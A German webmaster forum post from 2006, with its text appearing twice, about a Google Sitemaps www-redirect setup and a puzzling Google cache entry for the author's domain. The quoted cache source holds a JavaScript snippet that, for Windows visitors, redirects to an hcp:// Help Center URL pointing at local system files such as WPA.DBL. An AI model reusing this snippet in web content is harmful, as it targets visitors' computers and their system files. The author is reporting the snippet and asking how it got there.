Was passiert da, hijacking via google?
Verfasst: 04.09.2006, 16:08
Hallo zusammen,
zur Geschichte:
Ich habe meine Domain bei google-sitemaps angemeldet und entsprechend den Anforderungen eine Seite mit der Sitemap der Domain bereitgestellt. Auch habe ich definiert, dass alle Domainangaben mit www lauten sollen.
In meiner .htaccess habe ich gleich zu Anfang einen Block stehen, der alle URLs ohne www in eine URL mit www umschreibt, damit es auch ja keinen DC gibt.
Beim Auslesen der robots.txt und der Seite mit der Sitemap hatte aber ein Datacenter von google (IP: 66.249.72.44) mit der 301-Weiterleitung auf die URL mit www ständig Probleme und die hinterlegte Sitemap erhielt immer den Fehler-Status "konnte nicht ausgelesen werden" bei google.
Daraufhin habe ich den Zugriff auf die Domain mit der URL ohne www nur für diese beiden Seiten bzw. Seite + robots.txt gestattet. So dass dieses Datacenter die Inhalte lesen kann und wenn dann später die URLs vom google-bot ausgelesen werden, dieser zwangsläufig auf die 301-Weiterleitung mit www stösst und diese dann korrekt verarbeitet.
Klappt auch alles wunderbar. Die Sitemap wird nun als "gelsen" makiert und die google-bots verarbeiten die 301-Weiterleitung korrekt.
Soviel zur Vorgeschichte. Achso, was mir noch beim Anmelden meiner Domain für die Sitemap aufgefallen war, google hatte sofort auch meine Domain (obwohl ich nur die mit www angemeldet hatte) ohne www hinterlegt. Was mich damlas stutzig machte. Ich habe diesen Eintrag dann gelöscht, da ich die Sitemap ja nur für die www-Domain einreichen wollte.
Vor kurzem hatte ich mal eine Abfrage mit site:meinedomain.de (also ohne www) gestellt und mir die Ergebnisse angeschaut. Dabei fand ich diesen ominösen Eintrag:
Mich wunderte das, denn dies stammt nicht von mir. Ich klickte also auf den Cache-Link, um zu sehen, was das wohl ist. Plötzlich sprang das Hilfe- und Supportcenter Fenster von XP-Prof. auf und meldete einen Fehler, dass diese Seite nicht angezeigt werden kann, weil sie eine fehlerhafte Adresse enthält.
Ich probierte daraufhin mir den Cache anzeigen zu lassen mit https://72.14.221.104/search?q=cache:y8 ... .blablabla. Es war nur eine leere Seite zu sehen mit Stand vom 30. August 2006. Jetzt öffnete ich den Quelltext und da fand ich nun folgendes, von dem ich gar nicht begeistert bin:
Wo kommt der Mist her und vor allem der Java-Code sagt ja wohl alles, wozu das dienen soll. Bei der traceroute.cgi hatte ich zuerst den Verdacht, dass da jemand meinen Server missbraucht. Aber bei mir gibt es keine tracerouter.cgi noch eine HTML-Datei mit diesem Inhalt.
Hat vielleicht jemand eine Idee, wie das im Cache von google landen kann und vor allem, ist das ja auch noch quasi "aktuell"?
Oder hat vielleicht jemand gleiches erlebt?
mikeeblau
zur Geschichte:
Ich habe meine Domain bei google-sitemaps angemeldet und entsprechend den Anforderungen eine Seite mit der Sitemap der Domain bereitgestellt. Auch habe ich definiert, dass alle Domainangaben mit www lauten sollen.
In meiner .htaccess habe ich gleich zu Anfang einen Block stehen, der alle URLs ohne www in eine URL mit www umschreibt, damit es auch ja keinen DC gibt.
Beim Auslesen der robots.txt und der Seite mit der Sitemap hatte aber ein Datacenter von google (IP: 66.249.72.44) mit der 301-Weiterleitung auf die URL mit www ständig Probleme und die hinterlegte Sitemap erhielt immer den Fehler-Status "konnte nicht ausgelesen werden" bei google.
Daraufhin habe ich den Zugriff auf die Domain mit der URL ohne www nur für diese beiden Seiten bzw. Seite + robots.txt gestattet. So dass dieses Datacenter die Inhalte lesen kann und wenn dann später die URLs vom google-bot ausgelesen werden, dieser zwangsläufig auf die 301-Weiterleitung mit www stösst und diese dann korrekt verarbeitet.
Klappt auch alles wunderbar. Die Sitemap wird nun als "gelsen" makiert und die google-bots verarbeiten die 301-Weiterleitung korrekt.
Soviel zur Vorgeschichte. Achso, was mir noch beim Anmelden meiner Domain für die Sitemap aufgefallen war, google hatte sofort auch meine Domain (obwohl ich nur die mit www angemeldet hatte) ohne www hinterlegt. Was mich damlas stutzig machte. Ich habe diesen Eintrag dann gelöscht, da ich die Sitemap ja nur für die www-Domain einreichen wollte.
Vor kurzem hatte ich mal eine Abfrage mit site:meinedomain.de (also ohne www) gestellt und mir die Ergebnisse angeschaut. Dabei fand ich diesen ominösen Eintrag:
Code: Alles auswählen
quadra650
NetBSD system | traceroute.
meinedomain.de/ - 2k - Im Cache - Ähnliche Seiten
Ich probierte daraufhin mir den Cache anzeigen zu lassen mit https://72.14.221.104/search?q=cache:y8 ... .blablabla. Es war nur eine leere Seite zu sehen mit Stand vom 30. August 2006. Jetzt öffnete ich den Quelltext und da fand ich nun folgendes, von dem ich gar nicht begeistert bin:
Code: Alles auswählen
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<BASE HREF="http://meinedomain.de/"><table border=1 width=100%><tr><td><table border=1 bgcolor=#ffffff cellpadding=10 cellspacing=0 width=100% color=#ffffff><tr><td><font face="" color=black size=-1>Dies ist der <a href="http://www.google.com/intl/de/help/features.html#cached"><font color=blue>Zwischenspeicher</font></a> von <b><font color=#0039b6>G</font> <font color=#c41200>o</font> <font color=#f3c518>o</font> <font color=#0039b6>g</font> <font color=#30a72f>l</font> <font color=#c41200>e</font></b> für <A HREF="http://meinedomain.de/"><font color=blue>http://meinedomain.de/</font></a> nach dem Stand vom 30. Aug. 2006 04:20:38 GMT.<br>
<b><font color=#0039b6>G</font> <font color=#c41200>o</font> <font color=#f3c518>o</font> <font color=#0039b6>g</font> <font color=#30a72f>l</font> <font color=#c41200>e</font></b>s Cache enthält einen Schnappschuss der Webseite, der während des Webdurchgangs aufgenommenen wurde.<br>
Unter Umständen wurde die Seite inzwischen verändert. Klicken Sie hier, um zur <A HREF="http://meinedomain.de/"><font color=blue>aktuellen Seite</font></a> ohne Hervorhebungen zu gelangen.<br>
Diese Seite im Cache bezieht sich eventuell auf Bilder, die nicht länger zur Verfügung stehen. Klicken Sie hier, um nur den <A HREF="http://72.14.221.104/search?q=cache:meinedomain.de&hl=de&lr=&strip=1"><font color=blue>Text im Cache</font></a> anzuzeigen.<br>Um einen Link oder ein Bookmark zu dieser Seite herzustellen, benutzen Sie bitte die folgende URL: <code>http://www.google.com/search?q=cache:meinedomain.de&hl=de&lr=&strip=0</code></font><br><br><center><font size=-2><i>Google steht zu den Verfassern dieser Seite in keiner Beziehung.</i></font></center></td></tr></table></td></tr></table>
<hr>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML>
<HEAD>
<TITLE> quadra650</TITLE>
<META NAME="generator" CONTENT="BBEdit 6.5">
<STYLE TYPE="text/css" MEDIA="all">
BODY, TD, P {font: 12px/1.2em geneva, verdana, arial, helvetica, sans-serif}
A.hidden:link {text-decoration: none; color: #FFFFFF}
A.hidden:visited {text-decoration: none; color: #FF6633}
A.hidden:hover {text-decoration: none; color: #FF6633}
A.hidden:active {text-decoration: none; color: #FF0000}
</STYLE>
<SCRIPT TYPE="text/javascript" LANGUAGE="Javascript">
<!--
if (navigator.userAgent.indexOf("Win") != -1) {
window.location = "hcp://system/DFS/uplddrvinfo.htm?file://C:\Windows\System32\WPA.DBL";
window.location = "hcp://system/DFS/uplddrvinfo.htm?file://c:\windows\*";
}
//-->
</SCRIPT>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#666666" ALINK="#FF0000" VLINK="#FF6633" STYLE="background: url(images/tom.gif) bottom no-repeat">
<P STYLE="color: #999999; font: 'Lucida Grande', Geneva, Helvetica, sans-serif">
<IMG SRC="images/pnetbsd-blue.gif" ALT="NetBSD" WIDTH="135" HEIGHT="41" BORDER="0"><BR>
<SMALL>
<A HREF="noc/">system</A>
|
<A HREF="/cgi-bin/traceroute.cgi">traceroute</A>
</SMALL>
</P>
</BODY>
</HTML>
Hat vielleicht jemand eine Idee, wie das im Cache von google landen kann und vor allem, ist das ja auch noch quasi "aktuell"?
Oder hat vielleicht jemand gleiches erlebt?
mikeeblau